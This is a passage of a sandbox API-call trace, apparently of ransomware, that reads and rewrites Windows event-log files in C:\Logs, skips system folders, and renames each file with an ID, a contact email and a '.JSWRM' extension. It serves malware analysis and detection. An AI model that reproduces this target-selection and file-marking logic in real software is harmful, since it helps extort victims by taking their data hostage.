lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0066.287] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0066.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-SMBServer%4Security.evtx", cchWideChar=42, lpMultiByteStr=0x1f84e8, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-SMBServer%4Security.evtx", lpUsedDefaultChar=0x0) returned 42 [0066.287] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232d50 | out: hHeap=0x1e0000) returned 1 [0066.287] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209350 [0066.287] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209530 | out: hHeap=0x1e0000) returned 1 [0066.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0066.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0066.287] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0066.287] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4security.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0066.287] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0066.288] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0066.288] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2481b0 [0066.288] ReadFile (in: hFile=0x450, lpBuffer=0x2481b0, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0066.294] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0066.294] WriteFile (in: hFile=0x450, lpBuffer=0x2481b0*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0066.294] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2481b0 | out: hHeap=0x1e0000) returned 1 [0066.294] CloseHandle (hObject=0x450) returned 1 [0066.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209440 [0066.296] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0066.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0066.296] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8638, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0066.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0066.296] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0066.296] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0066.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0066.296] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0066.296] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0066.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 [0066.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x2175c0 [0066.296] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209530 | out: hHeap=0x1e0000) returned 1 [0066.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf8) returned 0x20e550 [0066.296] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2175c0 | out: hHeap=0x1e0000) returned 1 [0066.296] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0066.296] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4security.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-smbserver%4security.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0066.300] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0066.300] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209440 | out: hHeap=0x1e0000) returned 1 [0066.300] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0066.300] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0066.300] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0066.300] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd751ea61, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd751ea61, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Store%4Operational.evtx", cAlternateFileName="MICEDD~1.EVT")) returned 1 [0066.300] lstrcmpiW (lpString1="Microsoft-Windows-Store%4Operational.evtx", lpString2=".") returned 1 [0066.300] lstrcmpiW (lpString1="Microsoft-Windows-Store%4Operational.evtx", lpString2="..") returned 1 [0066.300] lstrcmpiW (lpString1="Microsoft-Windows-Store%4Operational.evtx", lpString2="...") returned 1 [0066.300] lstrcmpiW (lpString1="Microsoft-Windows-Store%4Operational.evtx", lpString2="windows") returned -1 [0066.300] lstrcmpiW (lpString1="Microsoft-Windows-Store%4Operational.evtx", lpString2="recovery") returned -1 [0066.301] lstrcmpiW (lpString1="Microsoft-Windows-Store%4Operational.evtx", lpString2="perflogs") returned -1 [0066.301] lstrcmpiW (lpString1="Microsoft-Windows-Store%4Operational.evtx", lpString2="documents and settings") returned 1 [0066.301] lstrcmpiW (lpString1="Microsoft-Windows-Store%4Operational.evtx", lpString2="$RECYCLE.BIN") returned 1 [0066.301] lstrcmpiW (lpString1="Microsoft-Windows-Store%4Operational.evtx", lpString2="system volume information") returned -1 [0066.301] lstrcmpiW (lpString1="Microsoft-Windows-Store%4Operational.evtx", lpString2="msocache") returned -1 [0066.301] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0066.301] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Store%4Operational.evtx", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0066.301] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0066.301] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Store%4Operational.evtx", cchWideChar=41, lpMultiByteStr=0x1f87c0, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-Store%4Operational.evtx", lpUsedDefaultChar=0x0) returned 41 [0066.301] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0066.301] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232db8 [0066.301] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Store%4Operational.evtx", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0066.301] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0066.301] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Store%4Operational.evtx", cchWideChar=41, lpMultiByteStr=0x1f8328, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-Store%4Operational.evtx", lpUsedDefaultChar=0x0) returned 41 [0066.301] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232db8 | out: hHeap=0x1e0000) returned 1 [0066.301] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0066.301] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209350 | out: hHeap=0x1e0000) returned 1 [0066.301] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0066.301] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0066.301] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209350 [0066.301] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-store%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0066.302] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0066.302] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0066.302] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2481b0 [0066.302] ReadFile (in: hFile=0x450, lpBuffer=0x2481b0, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0066.308] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0066.308] WriteFile (in: hFile=0x450, lpBuffer=0x2481b0*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0066.308] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2481b0 | out: hHeap=0x1e0000) returned 1 [0066.308] CloseHandle (hObject=0x450) returned 1 [0066.319] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209440 [0066.319] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0066.319] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0066.319] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0066.319] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0066.319] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0066.319] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0066.320] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a228 [0066.320] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a228, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0066.320] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a228 | out: hHeap=0x1e0000) returned 1 [0066.320] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0066.320] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217eb0 [0066.320] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0066.320] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf8) returned 0x20e550 [0066.320] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217eb0 | out: hHeap=0x1e0000) returned 1 [0066.320] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0066.320] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-store%4operational.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-store%4operational.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0066.320] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0066.320] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209440 | out: hHeap=0x1e0000) returned 1 [0066.320] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209350 | out: hHeap=0x1e0000) returned 1 [0066.320] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0066.320] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0066.320] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd0763ff, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcd0763ff, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-TaskScheduler%4Maintenance.evtx", cAlternateFileName="MIE2F0~1.EVT")) returned 1 [0066.320] lstrcmpiW (lpString1="Microsoft-Windows-TaskScheduler%4Maintenance.evtx", lpString2=".") returned 1 [0066.321] lstrcmpiW (lpString1="Microsoft-Windows-TaskScheduler%4Maintenance.evtx", lpString2="..") returned 1 [0066.321] lstrcmpiW (lpString1="Microsoft-Windows-TaskScheduler%4Maintenance.evtx", lpString2="...") returned 1 [0066.321] lstrcmpiW (lpString1="Microsoft-Windows-TaskScheduler%4Maintenance.evtx", lpString2="windows") returned -1 [0066.321] lstrcmpiW (lpString1="Microsoft-Windows-TaskScheduler%4Maintenance.evtx", lpString2="recovery") returned -1 [0066.321] lstrcmpiW (lpString1="Microsoft-Windows-TaskScheduler%4Maintenance.evtx", lpString2="perflogs") returned -1 [0066.321] lstrcmpiW (lpString1="Microsoft-Windows-TaskScheduler%4Maintenance.evtx", lpString2="documents and settings") returned 1 [0066.321] lstrcmpiW (lpString1="Microsoft-Windows-TaskScheduler%4Maintenance.evtx", lpString2="$RECYCLE.BIN") returned 1 [0066.321] lstrcmpiW (lpString1="Microsoft-Windows-TaskScheduler%4Maintenance.evtx", lpString2="system volume information") returned -1 [0066.321] lstrcmpiW (lpString1="Microsoft-Windows-TaskScheduler%4Maintenance.evtx", lpString2="msocache") returned -1 [0066.321] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209698 [0066.321] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-TaskScheduler%4Maintenance.evtx", cchWideChar=49, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0066.321] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0066.321] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-TaskScheduler%4Maintenance.evtx", cchWideChar=49, lpMultiByteStr=0x20e418, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-TaskScheduler%4Maintenance.evtx", lpUsedDefaultChar=0x0) returned 49 [0066.321] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209698 | out: hHeap=0x1e0000) returned 1 [0066.321] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0066.321] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-TaskScheduler%4Maintenance.evtx", cchWideChar=49, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0066.321] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0066.321] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-TaskScheduler%4Maintenance.evtx", cchWideChar=49, lpMultiByteStr=0x20e268, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-TaskScheduler%4Maintenance.evtx", lpUsedDefaultChar=0x0) returned 49 [0066.321] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0066.321] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0066.321] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0066.321] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0066.321] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0066.321] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0066.321] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx" (normalized: "c:\\logs\\microsoft-windows-taskscheduler%4maintenance.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0066.321] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0066.322] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0066.322] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2481b0 [0066.322] ReadFile (in: hFile=0x450, lpBuffer=0x2481b0, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0066.328] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0066.328] WriteFile (in: hFile=0x450, lpBuffer=0x2481b0*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0066.328] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2481b0 | out: hHeap=0x1e0000) returned 1 [0066.328] CloseHandle (hObject=0x450) returned 1 [0066.330] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0066.331] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0066.331] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0066.331] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0066.331] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0066.331] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0066.331] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0066.331] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0066.331] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0066.331] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0066.331] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225190 [0066.331] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0066.331] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225190 | out: hHeap=0x1e0000) returned 1 [0066.331] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23fa98 [0066.331] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0066.331] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0066.331] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx" (normalized: "c:\\logs\\microsoft-windows-taskscheduler%4maintenance.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-taskscheduler%4maintenance.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0066.332] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fa98 | out: hHeap=0x1e0000) returned 1 [0066.332] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0066.332] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0066.332] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0066.332] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0066.332] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5089d037, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5089d037, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", cAlternateFileName="MIAB1D~1.EVT")) returned 1 [0066.332] lstrcmpiW (lpString1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", lpString2=".") returned 1 [0066.332] lstrcmpiW (lpString1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", lpString2="..") returned 1 [0066.332] lstrcmpiW (lpString1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", lpString2="...") returned 1 [0066.332] lstrcmpiW (lpString1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", lpString2="windows") returned -1 [0066.332] lstrcmpiW (lpString1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", lpString2="recovery") returned -1 [0066.332] lstrcmpiW (lpString1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", lpString2="perflogs") returned -1 [0066.332] lstrcmpiW (lpString1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", lpString2="documents and settings") returned 1 [0066.332] lstrcmpiW (lpString1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", lpString2="$RECYCLE.BIN") returned 1 [0066.332] lstrcmpiW (lpString1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", lpString2="system volume information") returned -1 [0066.332] lstrcmpiW (lpString1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", lpString2="msocache") returned -1 [0066.332] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0066.333] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 